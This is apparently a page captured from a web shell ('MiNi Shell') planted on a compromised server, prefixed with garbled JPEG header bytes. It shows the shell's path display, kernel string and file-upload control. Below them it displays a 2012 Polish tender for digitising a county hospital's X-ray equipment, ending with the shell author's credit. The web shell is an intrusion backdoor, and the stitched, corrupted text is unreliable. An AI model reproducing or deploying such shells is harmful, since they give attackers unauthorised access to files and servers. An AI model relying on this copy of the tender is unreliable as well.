JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120710/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120710/243582-N-2012.html

<p class="kh_header"><b>Nowe Miasto Lubawskie: Ucyfrowienie stacjonarnego aparatu RTG w Lubawie dla Szpitala Powiatowego
w Nowym Mieście Lubawskim Sp. z o.o.</b><br>
<b>Numer ogłoszenia: 243582 - 2012; data zamieszczenia: 10.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Nowomiejski reprezentowany przez Zarząd Powiatu w Nowym Mieście Lubawskim , ul. Rynek 1, 13-300 Nowe Miasto Lubawskie, woj. warmińsko-mazurskie, tel. 056 4724220, faks 056 4724222.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> sekretariat@powiat-nowomiejski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Ucyfrowienie stacjonarnego aparatu RTG w Lubawie dla Szpitala Powiatowego
w Nowym Mieście Lubawskim Sp. z o.o..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1  Przedmiotem zamówienia jest ucyfrowienie stacjonarnego aparatu RTG w Lubawie dla Szpitala Powiatowego w Nowym Mieście Lubawskim Sp. z o.o. zgodnie z parametrami określonymi poniżej :

                                              OPIS  PRZEDMIOTU  ZAMÓWIENIA
	
OPIS  WYMAGANYCH PARAMETRÓW			
I	Automatyczny jednokasetowy skaner (czytnik) do płyt obrazowych - 1 szt.
1.		Producent			
2.		Nazwa i typ urządzenia			
3.		Głębia szarości obrazu generowanego i wysyłanego do stacji roboczej oraz do kamery cyfrowej min. 16 bitów			
4.		Skanowanie wszystkich obsługiwanych formatów płyt z rozdzielczością co najmniej 10 pikseli)mm			
5.		Rodzaje i formaty obsługiwanych kaset z płytami obrazowymi, co najmniej kasety do badań ogólnodiagnostycznych formatów 15x30 cm, 18x24 cm, 24x30 cm i 35x43 cm 		
(podać wszystkie rodzaje i formaty)	
6.		Przepustowość dla kaset 35x43 cm przy rozdzielczości skanowania min. 10 pikseli)mm min. 35 płyt)godz.			
7.		Zdalny nadzór i serwisowanie urządzenia			
8.		Masa max. 75 kg			
9.		Moc pobierana max. 200 W			
10.		Skaner (czytnik) zarejestrowany)zgłoszony w Polsce jako wyrób medyczny w klasie co najmniej IIa lub posiadający w terminie składania oferty certyfikat CE właściwy dla urządzeń)oprogramowania medycznego w klasie co najmniej IIa stwierdzający zgodność z dyrektywą 93)42)EEC 		
(załączyć dokumenty na potwierdzenie)	

	OPIS  WYMAGANYCH PARAMETRÓW			
II	Kasety z płytami  obrazowymi - 1 kpl
1.		Producent			
2.		Nazwa i typ			
3.		Gwarantowana trwałość płyty obrazowej co najmniej 10 000 (ilość cyklów zapisu i odczytu)			
4.		Kaseta do badań ogólnodiagnostycznych z płytą obrazową rozmiar 35x43cm, skanowanie z rozdzielczością co najmniej 10 pikseli)mm - 6 szt.			
5.		Kaseta do badań ogólnodiagnostycznych z płytą obrazową rozmiar 24x30cm, skanowanie z rozdzielczością co najmniej 10 pikseli)mm - 5 szt.			
6.		Kaseta do badań ogólnodiagnostycznych z płytą obrazową rozmiar 18x24cm, skanowanie z rozdzielczością co najmniej 10 pikseli)mm - 4 szt.			
7.		Obróbka wszelkich formatów kaset wykonywana całkowicie automatycznie przez skaner, bez potrzeby ręcznego przekładania przez obsługę			
8.		Płyty obrazowe nie zintegrowane z kasetą - możliwość niezależnej wymiany płyt obrazowych i kaset			
9.		Kasety z płytami obrazowymi kompatybilne z systemem CR 30 w placówce Nowe Miasto Lubawskie. W przypadku awarii kaset z płytami obrazowymi w jednej z placówek, możliwość przewiezienia i użycia kaset z płytami z drugiej placówki. 			
10.		Kasety z płytami obrazowymi zarejestrowane)zgłoszone w Polsce jako wyrób medyczny w klasie co najmniej IIa lub posiadające w terminie składania oferty certyfikat CE właściwy dla urządzeń/oprogramowania medycznego w klasie co najmniej IIa stwierdzający zgodność z dyrektywą 93)42)EEC		
(załączyć dokumenty na potwierdzenie)	

	OPIS  WYMAGANYCH PARAMETRÓW			
III	Stanowisko przypisywania danych pacjenta do obrazów - 1 kpl
1.		Producent			
2.		Nazwa i typ urządzenia			
3.		Stacja niezintegrowana (oddzielny element) z czytnikiem płyt obrazowych			
4.		Stanowisko przypisywania danych pacjenta do obrazów kompatybilne ze stanowiskiem technika w placówce Nowe Miasto Lubawskie. W przypadku awarii jednego ze stanowisk, możliwość przewiezienia, podłączenia i konfiguracji drugiego ze stanowisk.			
5.		Komputer, minimalne wymagania: procesor dwurdzeniowy 3 GHz, 2 GB pamięci RAM, dysk twardy 250 GB, DVD RW, karta sieciowa 100)1000 Mbps, klawiatura, mysz optyczna, system operacyjny			
6.		Monitor LCD kolorowy, min. 19), o min. parametrach: rozdzielczość 1280x1024, jasność 250 cd)m2, kontrast 800:1, kąty widzenia pionowy)poziomy 160)160			
7.		Obsługa stanowiska poprzez monitor, klawiaturę i mysz			
8.		Interfejs oprogramowania medycznego stacji w całości w języku polskim (wraz z pomocą kontekstową)			
9.		Oprogramowanie dedykowane do wykonywania badań ogólnodiagnostycznych			
10.		Łączenie danych demograficznych pacjenta i rodzaju badania z obrazem CR 			
11.		Wpisywanie danych pacjentów bezpośrednio na stanowisku			
12.		Możliwość rozszerzenia oprogramowania stacji o wykonywanie badań nagłych (bez rejestracji jakichkolwiek danych pacjenta)			
13.		Oprogramowanie umożliwia bezpośrednie diagnozowanie i monitorowanie procesów życiowych, np. badania urograficzne 		
( załączyć certyfikat wyrobu medycznego)	
14.		Wyszukiwanie obrazów)badań na podstawie zadanych kryteriów, co najmniej: imię i nazwisko pacjenta, identyfikator pacjenta, data wykonania badania, rodzaj badania 		
( podać kryteria)	
15.		Możliwość rozszerzenia oprogramowania stacji o funkcję MPPS (Modality Performed Procedure Step)			
16.		Multisesyjność - możliwość otwarcia co najmniej 15 sesji z różnymi badaniami w tym samym czasie			
17.		Możliwość otwarcia zamkniętego badania i dodania nowego obrazu z dodatkowej ekspozycji			
18.		Podstawowe oprogramowanie do obróbki badań pozwalające na zmianę zaczernienia i kontrastu, inwersję, kolimację prostokątną, kolimację wielokątną, obracanie obrazu, automatyczne przesyłanie obrazu w formacie DICOM na stację lekarską i do systemu PACS, kompozycja wydruków			
19.		Wyświetlanie obrazu badania każdorazowo po wykonaniu skanowania projekcji z możliwością akceptacji lub odrzucenia			
20.		Funkcjonalność przywrócenia obrazu po dokonaniu przekształceń do pierwotnej wersji jednym kliknięciem			
21.		Automatyczne blendowanie nienaświetlonych fragmentów obrazu			
22.		Oprogramowanie umożliwiające usuwanie obrazu kratki stałej			
23.		Automatycznie dodawany do obrazu marker umożliwiający ustalenie pozycji oryginalnego obrazu (np. po obrocie lub inwersji na stacji technika)			
24.		Oprogramowanie wyświetlające wskaźniki statusu obrazów i badań, min.:
- kaseta zidentyfikowana
- obraz wydrukowany
- obraz zarchiwizowany
- badanie otwarte ) wydrukowane) zarchiwizowane		

(podać dostępne wskaźniki statusu)	
25.		Generowanie histogramu dla obrazu			
26.		Kalibracja liniowa i kołowa pozwalająca na wykonywanie pomiarów w wielkościach rzeczywistych			
27.		Wykonywanie pomiarów - pomiar odległości, pomiar kąta, automatyczny pomiar różnicy długości nóg, pomiary skoliozy, automatyczne wyznaczanie połowy oznaczonej długości			
28.		Nanoszenia adnotacji - min. predefiniowane teksty, linie, strzałki, kształty podstawowe (okrąg, prostokąt, wielobok), wybór koloru adnotacji z palety kolorów			
29.		Płynne powiększanie obrazu, powiększanie wybranego fragmentu obrazu, lupa  			
30.		Oprogramowanie stacji roboczej wykorzystujące algorytm wstępnej automatycznej obróbki obrazu		
(podać nazwę handlową oprogramowania)	
31.		Funkcjonalność automatycznego dopasowywania parametrów obróbki obrazu na podstawie wybranego rodzaju projekcji			
32.		Oprogramowanie umożliwiające wykonywanie badań pantomograficznych rozmiaru 15x30 cm			
33.		Możliwość rozszerzenia oprogramowania stacji o dedykowane oprogramowanie pediatryczne optymalizujące algorytm obróbki obrazu dla różnych grup wiekowych (podział na co najmniej 4 grupy w zakresie wieku 0-16 lat)			
34.		Możliwość rozszerzenia oprogramowania stacji o wykonywanie badań kości długich - oprogramowanie automatycznie łączące obraz do rozmiaru min. 35x124 cm			
35.		Funkcjonalność wpisywania do systemu danych o parametrach ekspozycji (kV, mAs)			
36.		Nagrywanie na lokalnej nagrywarce i sieciowym duplikatorze na płytę CD i DVD obrazów wybranego pacjenta w formacie DICOM wraz z przeglądarką DICOM uruchamiająca się automatycznie na komputerze klasy PC			
37.		Wydruk badań na kamerach cyfrowych poprzez DICOM Print			
38.		Wydruk kilku obrazów na jednej błonie, co najmniej 1)2)3)4 obrazy na jednej błonie			
39.		Dostęp do stacji tylko po uprzednim zalogowaniu się przez technika			
40.		UPS dobrany mocą do zastosowanego komputera ze sterowaniem zapewniającym automatyczne, sekwencyjne zamykanie oprogramowania		
(podać nazwę i typ)	
41.		Oprogramowanie CR spełniające profile integracji IHE, min. Scheduled Workflow, Patient Information Reconciliation, Consistent Time, Portable Data for Imaging		(podać listę spełnianych profile IHE, załączyć deklarację producenta potwierdzoną dostępem do deklaracji producenta poprzez stronę http://product-registry.ihe.net)	
42.		Oprogramowanie CR zarejestrowane)zgłoszone w Polsce jako wyrób medyczny w klasie co najmniej IIa lub posiadające w terminie składania oferty certyfikat CE właściwy dla urządzeń)oprogramowania medycznego w klasie co najmniej IIa stwierdzający zgodność z dyrektywą 93)42)EEC		
(załączyć dokumenty na potwierdzenie)	

	OPIS  WYMAGANYCH PARAMETRÓW			
IV	Drukarka sucha z jednym formatem błon dostępnym on-line - 1 szt.
1.		Producent			
2.		Nazwa i typ urządzenia			
3.		Sposób uzyskania obrazu			
4.		Interfejs typu DICOM Print 3.0			
5.		Rozdzielczość wydruku, min. 320 dpi			
6.		Liczba odcieni skali szarości, min. 12 bitów			
7.		Wydajność dla formatu 35x43 cm min. 70 błon )godz.			
8.		Czas pierwszego wydruku formatu 35x43 cm, max. 80 s.			
9.		Dostępność formatu błon 35x43 cm			
10.		Dostępność min. jednego formatu błon nie większego niż 27,5x35 cm				
11.		Zmiana formatu błony przez użytkownika (bez potrzeby interwencji serwisu)			
12.		Możliwość wielokrotnej zmiany formatów błon. Możliwość załadunku niepełnych opakowań filmów.			
13.		Nienaświetlone błony nieczułe na światło dzienne			
14.		Zdalny nadzór i serwisowanie urządzenia			
15.		Inne parametry kamery:
- powierzchnia zabudowy
- masa urządzenia
- zasilanie
- zakres temperatur pracy
- zakres wilgotności powietrza
- głośność urządzenia, max., stand-by		


(podać wszystkie parametry)	
16.		Kamera zarejestrowana)zgłoszona w Polsce jako wyrób medyczny w klasie co najmniej I lub posiadająca w terminie składania oferty certyfikat CE właściwy dla urządzeń/oprogramowania medycznego w klasie co najmniej I stwierdzający zgodność z dyrektywą 93)42)EEC		
(załączyć dokumenty na potwierdzenie)	

	OPIS  WYMAGANYCH PARAMETRÓW			
V	Pozostałe wymagania
1.		Następujące elementy oferowanego systemu muszą pochodzić od tego samego producenta celem zapewnienia ich pełnej kompatybilności i integracji:
- czytnik płyt obrazowych, 
- kasety z płytami obrazowymi, 
- oprogramowanie medyczne stanowiska przypisywania danych pacjenta do obrazów
- drukarka błon			
2.		Zamawiający zastrzega sobie możliwość wezwania Wykonawców do przeprowadzenia prezentacji wybranych przez Zamawiającego wymagań SIWZ w jednej z jednostek, w których funkcjonuje system przedmiotowo zgodny - w zakresie min. urządzeń medycznych i oprogramowania medycznego - z wymaganym w niniejszym SIWZ. Prezentacja odbędzie się przy udziale max. 3 osób ze strony Zamawiającego w ciągu max. 3 dni roboczych od wyrażenia chęci takiej prezentacji przez Zamawiającego po otwarciu ofert.		
(podać minimum 3 placówki, z których Zamawiający wybierze jedną dla celów prezentacji)	
3.		Szkolenia użytkowników w zakresie dostarczanych urządzeń i oprogramowania. Ilość osób do przeszkolenia i czas szkoleń: X techników RTG,       1 x 1 godz.			

	OPIS  WYMAGANYCH PARAMETRÓW			
VI	Gwarancja
1.		Okres gwarancji i obsługi serwisowej na oferowane urządzenia -  co najmniej 12  miesięcy			
2.		W okresie gwarancji minimum 2 nieodpłatne przeglądy gwarancyjne rocznie		( podać ilość)	
3.		Sposób przyjmowania zgłoszeń o awariach w okresie trwania umowy gwarancyjnej i w okresie pogwarancyjnym			
4.		Wykaz punktów serwisowanych autoryzowanych przez producenta w Polsce			
5.		Czas reakcji na podjęcie czynności serwisowych (rozumiane jako kontakt telefoniczny lub rozpoczęcie interwencji zdalnej) -  nie dłużej niż 8 godz. 			
(godz. w dni robocze)	
6.		Czas reakcji na podjęcie czynności serwisowych (rozumiane jako przyjazd serwisu) - nie dłużej niż 48 godz. 			
(godz.w dni robocze)	
7.		Czas na usunięcie awarii (rozumiane jako przywrócenie pierwotnej funkcjonalności) - nie dłużej niż 96 godz.	 		(godz. w dni robocze)	
8.		Instrukcje obsługi w języku polskim lub angielskim do wszystkich urządzeń w formie elektronicznej na CD - przy dostawie			

3.2  Przedmiot zamówienia obejmuje:
      1) dostawę fabrycznie nowych urządzeń, pochodzących z bieżącej produkcji,
      2) przekazanie przedmiotu zamówienia, na podstawie protokołu zdawczo -  odbiorczego
          upoważnionemu pracownikowi Zamawiającego wraz z instrukcjami obsługi w języku polskim,
     3) instalację i uruchomienie urządzeń, przeszkolenie pracowników Użytkownika
         w zakresie ich obsługi w miejscu montażu: Pracownia RTG, 14-260 Lubawa, ul. Kupnera 68, 
     4) konserwację i przeglądy serwisowe w okresie udzielonej przez Wykonawcę gwarancji według 
         zaleceń producenta, na warunkach określonych w §  5 wzoru umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.11.18.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 84.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Warunkiem udziału w postępowaniu przetargowym jest wniesienie wadium w wysokości 1 600,00  zł  (słownie: jeden tysiąc sześćset złotych). Wadium wnosi się przed upływem terminu składania ofert, tj. do dnia 23 lipca 2012 r. do godz. 11:00.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia ten warunek jeżeli Wykonawca wykaże się wykonaniem    co najmniej 2 tożsamych z przedmiotem zamówienia dostaw z usługą w zakresie urządzeń medycznych i oprogramowania medycznego w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia warunki tego pkt  jeżeli Wykonawca złoży oświadczenie, że  spełnia warunki udziału w postępowaniu j.w.  w terminie i na warunkach określonych w specyfikacji istotnych warunków zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia warunki tego pkt  jeżeli Wykonawca złoży oświadczenie, że  spełnia warunki udziału w postępowaniu j.w.  w terminie i na warunkach określonych w specyfikacji istotnych warunków zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia warunki tego pkt  jeżeli Wykonawca złoży oświadczenie, że  spełnia warunki udziału w postępowaniu j.w.  w terminie i na warunkach określonych w specyfikacji istotnych warunków zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.warmia.mazury.pl/powiat_nowomiejski<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe
     ul. Rynek 1
     13-300 Nowe Miasto Lubawskie
pokój nr 20.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.07.2012 godzina 11:00, miejsce: Starostwo Powiatowe
     ul. Rynek 1
     13-300 Nowe Miasto Lubawskie
pokój nr 16 (sekretariat Starosty Nowomiejskiego).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com